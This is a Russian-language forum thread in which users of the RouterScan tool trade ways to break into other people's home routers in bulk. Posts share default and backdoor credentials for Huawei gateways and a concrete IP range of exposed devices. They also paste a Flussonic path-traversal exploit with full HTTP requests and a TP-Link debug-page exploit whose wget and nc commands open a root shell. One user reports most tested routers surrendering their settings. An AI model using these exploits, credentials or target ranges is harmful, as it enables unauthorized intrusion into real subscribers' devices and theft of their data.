опять форум в дауне кстати госопда гуру, ни у кого случайно не завалялся эксплойтик по обходу аутентификации для хом гатевей? есть только отдельными скриптами. а напрямую запросами из браузера не нашел.
Я об ней не знать, так бы помог. Ну эта тема не весь форум, согласен с binarymaster лучше, но пока он отсутствует мы копим уязвимости для RS, ничего более не остается , так что не грусти. Felis-Sapiens тоже гуру, может и немного в разных направлениях, но все равно. RS - все сильнее.
Вопрос к гуру) есть ли надежда на то что вы выпустите lite версию программы? Для запуска в дальнейшем на андроид устройствах через эмулятор) lite версия с миним функций для уменьшения нагрузки на процессор и память) но с тем же количеством эксклоитов)
Читал в этой ветке ссылку где ip всех стран можно спарсить по прову, не могу найти, скиньте кому не влом) P.S и еще поделитесь норм словариком именно под RS) мона и в ПМ)
Скажем дружно на*** нужно. Через кривой эмулятор, с неудобным упарвлением, без нормального лекарства это не вариант. Нужно пилить нативное приложение под ведро. На мобильных устройствах есть свои плюсы, минусы и особенности работы такого софта. Навскидку: 1) Обычно сканируется локальная сеть - есть проблема с регулярной переделкой списка ip для сканирования 2) Интернет на мобильном устройстве - это не витая пара, а слабый и нестабильный вайфай, что тоже нужно учесть.
У каждого свои нужды) и через wifi все нормально работает, если без фанатизма ) и таскать ноутбук не всегда удобно. А телефон с планшетом всегда под рукой и просканировать небольшой диапазон всегда можно) очень удобно, пускай не 1000ми гудов в день. Но несколько десятков гудов в день насканить можно)
У меня на ура эти Thomson/Technicolor отдавали настройки в большинстве случаев там такая комбинация<empty>:admin насканировал в свое время дофига таких
что значит не грусти? без вас скучно я согласен, что РС сильнее. и это радует. и внушает некоторое удовлетворение маленькой причастности к такому знаменательному труду. глядишь - наш великий О'SENSEI - binarymaster свою лабораторию пентеста организует. и нас как тестеров не забудет кстати - спасибо Triton_Mgn. я ничуть не сомневался в вас я давно уже знаю, что с вами смело можно идти в разведку (без иронии) теперь серьезно и по теме. HuaweiHomeGateway особенно много встречается на порту 7547. недавно наткнулся. провы порты прячут раньше по этой сетке ходил но на стандартных портах. думал, что в удаленке нет роутеров. а тут вдруг попробовал нестандартные порты и нашел неимоверное количество этих хомов. но эксплойты в основном через метасплойт. интересно было бы найти что-то ближе к роутерскану. может кто встречал и поделится во имя общего блага ?
кстати, порадовала еще одна фишка - экспериментировал с роутерсканом и увидел одну приятную мелочь (я во всяком случае об этом не знал). уменьшил количество потоков до 50 ( обычно уменьшал всегда до 130) и количество найденных роутеров увеличилось по одному и тому же провайдеру
на счет Felis-Sapiens даже вопросов быть не может.гуру с большой буквы. но тоже без binarymaster редко ветку посещает :-( . ну да ладно. копим - так копим как-то тут поднимался вопрос по поводу Flussonic. вот нарыл эксплойты, правда пока не разобрался с ними до конца. не знаю, можно ли его будет прикрутить к роутерскану. вроде по http работают.буду пробовать. эти соники частенько попадаются при сканировании РСк. жалко их оставлять без внимания Spoiler: Flussonic Media Server Multiple Vulnerabilities Document Title: ============ Flussonic Media Server Multiple Vulnerabilities Release Date: =========== June 29, 2014 Product & Service Introduction: ======================== Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5). Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network. Abstract Advisory Information: ======================= BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3 Vulnerability Disclosure Timeline: ========================= June 26, 2014 : Contact with Vendor June 26, 2014 : Vendor Response June 26, 2014 : Version 4.3.4 Deployed June 29, 2014 : Public Disclosure Discovery Status: ============= Published Affected Product(s): =============== Erlyvideo, LLC Product: Flussonic Media Server 4.1.25 - 4.3.3 Exploitation Technique: ================== AFR: Remote, Unauthenticated ADL: Remote, Authenticated Severity Level: =========== High Technical Details & Description: ======================== 1. Arbitrary File Read (Unauthenticated) It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method. 2. Arbitrary Directory Listing (Authenticated) It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”. Proof of Concept (PoC): ================== Proof of Concept AFR Request & Response: GET /../../../etc/flussonic/flussonic.conf HTTP/1.1 Host: 6.6.6.100:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Connection: keep-alive Server: Cowboy Date: Thu, 26 Jun 2014 09:50:57 GMT Content-Length: 191 Content-Type: text/plain Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687 # Default ports Flussonic M1 Media server listens on http 80; http 8080; rtmp 1935; rtsp 554; pulsedb /var/run/flussonic; edit_auth flussonic letmein!; live mylive; file vod { path priv; } 2. Proof of Concept ADR Request & Response: GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1 Host: 6.6.6.100:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h Connection: keep-alive HTTP/1.1 200 OK Connection: keep-alive Server: Cowboy Date: Thu, 26 Jun 2014 11:04:12 GMT Content-Length: 7555 X-Route-Time: 28 X-Run-Time: 8090 Content-Type: application/json {“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"}, ……… {“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]} Security Risk: ========== The risk of the vulnerabilities above estimated as high and medium. Credits & Authors: ============== Bilgi Güvenliði Akademisi Тип воздействия: Раскрытие важных данных Раскрытие системных данных
в догон. проводил тут на днях проверку провайдеров. пришел к выводу - если найдем способ подобраться к HuaweiHomeGateway работающих на 7547 порту - результаты сканирования увеличатся в разы. ряд провайдеров целые ветки прячут на этом порту. видимо энтузиасты RS достали до печенок
экспериментировал сегодня с HuaweiHomeGateway и роутерсканом. выяснил одну маленькую вещь - пассы провайдер на все гетвэи ставит дефолтные - root:admin. при скане роутерскан их не определяет. в браузере пасс принимается, но страницу настроек не выдает во внешнюю сеть. как-то так получается. потому роутерскан и не выдает гуды по ним. будем копать дальше
Копайте мистер копайте, RS не всевидящий же , тоже было замечено почему спарсенная пара логин пароль не выдает внутренности,
В своей сети попадаются такие, на сайте оператора нет прошивок к ним, методом отсеивания выбрал 4 модели с сайта производителя. благо их там не много, в прошивках одинаковые shadow , расшифровка дала лог\пас root:root , значит у вашего провайдера своя прошивка или он сам меняет пас. Можете поделиться ip диапазоном с HuaweiHomeGateway, хочется в прошивке покапать. И еще 7547 порт это CWMP говорит wiki, как с ним общаться кто знает? Также попадаются Netgear EVG1500 CPE (Есть ли у кого прошивка?) и SERCOMM CPE - что за зверь?
привет triton вот нарыл интересный эксплойтик на туполинки http://IP/userRpmNatDebugRpm26525557/start_art.html пример как тут Spoiler: пример эксплойта root@secu:~# ls -l /srv/tftp/nart.out -rw-r--r-- 1 root root 871604 Mar 11 18:23 /srv/tftp/nart.out root@secu:~# nc 192.168.0.1 2222 (UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html Connecting to 192.168.0.1:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: "start_art.html" [ <=> ] 426 --.-K/s in 0s 2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426] root@secu:~# nc 192.168.0.1 2222 ps PID Uid VmSize Stat Command 1 root 404 S init 2 root SW< [kthreadd] 3 root SW< [ksoftirqd/0] 4 root SW< [events/0] 5 root SW< [khelper] 6 root SW< [async/mgr] 7 root SW< [kblockd/0] 8 root SW [pdflush] 9 root SW [pdflush] 10 root SW< [kswapd0] 17 root SW< [mtdblockd] 18 root SW< [unlzma/0] 71 root 2768 S /usr/bin/httpd 76 root 380 S /sbin/getty ttyS0 115200 78 root 208 S ipcserver 82 root 2768 S /usr/bin/httpd 83 root 2768 S /usr/bin/httpd 86 root 732 S ushare -d -x -f /tmp/ushare.conf 92 root 348 S syslogd -C -l 7 96 root 292 S klogd 101 root SW< [napt_ct_scan] 246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf 286 root 2768 S /usr/bin/httpd 299 root 2768 S /usr/bin/httpd 300 root 2768 S /usr/bin/httpd 305 root 2768 S /usr/bin/httpd 307 root 2768 S /usr/bin/httpd 309 root 2768 S /usr/bin/httpd 310 root 2768 S /usr/bin/httpd 389 root 2768 S /usr/bin/httpd подключается по арт и кажется можно выдрать настройки. еще не пробовал. пробовал только подключаться. написано было что работает с туполинками TL-WDR4300; TL-WR743ND (v1.2 v2.0) но я тестил и на TP-LINK TL-WR843ND; TP-LINK TL-WR940N которые роутерскан не спарсил в гуды. подключение пошло. значит можно играть дальше может к возвращению наших гуру binarymaster и Felis-Sapiens что нибудь стоящее для модернизации роутерскана и соберем
ну например этот 178.168.78.1-178.168.79.254 на 7547 порту их валом. как я и говорил - провайдер на все хювеи ставит пароль root:admin. но вот как до прошивки добраться - пока не знаю по поводу SWMP нашел одну интересную статейку. по крайней мере стало понятно почему не дает настройки. http://byfly.ws/instrukcii/4923-otklyuchaem-cwmp-kontrol-nad-modemami-promsvyaz-zte.html
backdoor в некоторых моделях Huawei HG8245 менедж аккаунт admin:*6P0N4dm1nP4SS* а также по умолчанию root:admin подробности тут Spoiler: detail The Huawei HG8245 ONT, firmware version V1R006C00S100 which provides cellular services, contains 3 severe vulnerabilities: two administrator accounts enabled by default and a public administration interface exposed to the Internet. The backdoor is a web management account enabled by default and the password cannot be changed. In this version the default administrator password is: admin:*6P0N4dm1nP4SS* Another administrator user exists by default for the telnet service: root:admin ссылка http://websec.ca/advisories/view/Huawei-web-backdoor-and-remote-access это конечно старенькая дырочка, но может кому-то пригодится. не все же тут хакеры со стажем есть и начинающие хац... пардон - пентестеры и кстати из проверенных мной вчера 32 Huawei HG8245С и Huawei HG8245H, 27 отдали настройки по рут-админ. только роутерскан их не спарсил видимо из-за того, что страница настроек грузится очень долго. и пока дойдет дело до этой пары роутер в локе